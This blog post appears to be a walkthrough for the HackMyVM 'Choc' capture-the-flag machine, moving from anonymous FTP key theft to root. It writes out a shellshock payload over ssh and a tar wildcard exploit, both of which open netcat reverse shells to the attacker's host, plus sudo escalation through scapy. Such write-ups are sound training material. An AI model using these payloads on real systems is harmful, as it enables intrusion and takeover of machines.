HackMyVm Choc Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Choc


Nmap scan ports, only 21 and 22 are open.

nmap -sV -sC -p- -oN ports.log 192.168.56.100

图片.png


Login ftp as anonymous, get id_rsa.

图片.png


Try ssh, get user name "carl".

图片.png


Try to login ssh as "carl" with the id_rsa, the vm displayed a message and quit.

图片.png


Try bash shellshock exploit through ssh. Listen at port 1234 in one terminal, ssh login in another terminal.

ssh carl@192.168.56.100 -i id_rsa  '() { :;}; nc 192.168.56.150 1234 -e /bin/bash

图片.png


Use python pty to get interactive shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'


There are 3 users in home folder.

图片.png


In torki's home, find secret_garden/diary.txt.

图片.png


There is a backup.sh file, which we can not read now.

Try to find files belong to user torki, find /tmp/backup_home.tgz.

find / -user torki 2>/dev/null

图片.png


Use tar -xvf to unzip it, it's diary.txt.

Now we can use tar wildcard exploit.

Listen port 2234 at one terminal, and create 3 files in /home/torki/secret_garden.

Wait 1 minute, we will get reverse shell.

echo '' > secret_garden/--checkpoint=1
echo '' > 'secret_garden/--checkpoint-action=exec=sh pwn.sh'
echo 'nc 192.168.56.150 2234 -e /bin/bash' > secret_garden/pwn.sh
chmod +x secret_garden/pwn.sh

图片.png


In /home/torki/.ssh, get id_rsa, now we can login ssh as torki.

图片.png


Check sudo -l, we can escate to user sarah.

图片.png


Run sudo -u sarah /usr/bin/scapy, in scapy interactive mode, run 'import pty;pty.spawn("/bin/bash")'.

图片.png


Check sudo -l again.

图片.png


Now we can get /root/.ssh/id_rsa.

图片.png


And get root finally.

图片.png

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

«    2022年5月    »
1
2345678
9101112131415
16171819202122
23242526272829
3031
网站分类
搜索
最新留言
文章归档
网站收藏
  • 订阅本站的 RSS 2.0 新闻聚合

Powered By Z-BlogPHP 1.7.2